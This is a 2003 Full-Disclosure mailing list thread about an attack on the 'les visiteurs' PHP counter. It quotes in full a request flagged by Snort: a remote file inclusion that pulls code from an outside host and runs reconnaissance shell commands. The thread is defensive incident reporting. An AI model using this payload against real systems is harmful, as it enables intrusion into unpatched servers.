[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000b01c3b836$02b07790$050010ac@Estila>
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: file inclusion (les visiteurs)
Hi Daniel ,
They are kiddies... :(
I was looking the files and there are only high-risk-rated exploits
downloaded from packet storm , ptrace , etc .
And they are running remote php shells in their server.... xD
See you in the IRC tonight ?
Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________
----- Original Message -----
From: "Dan" <dan@...kedbox.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, December 01, 2003 6:02 PM
Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
> This is the same set of files that I noticed last week(xfteam.net) it
seems
> they closed their domain down? (I cannot find it)
> Does anyone know if these ppl are a real sec organisation? or just some
> kiddies ?
>
> Cheers,
> Daniel.
>
> "Evert Daman" <evert@...ipix.org> wrote:
>
> >
> > last night snort detected this request:
> >
> > GET
> >
>
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
> >
> >
> > because i patched 'les visiteurs' as described by 'matthieu peschaud'
> > on bugtraq on the 26 of october nothing happend, but it looks like
someone
> > is trying to exploit this bug.
> > just want to mention it to this wonderfull list :)
> >
> > kind regards,
> > Evert
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
Powered by blists - more mailing lists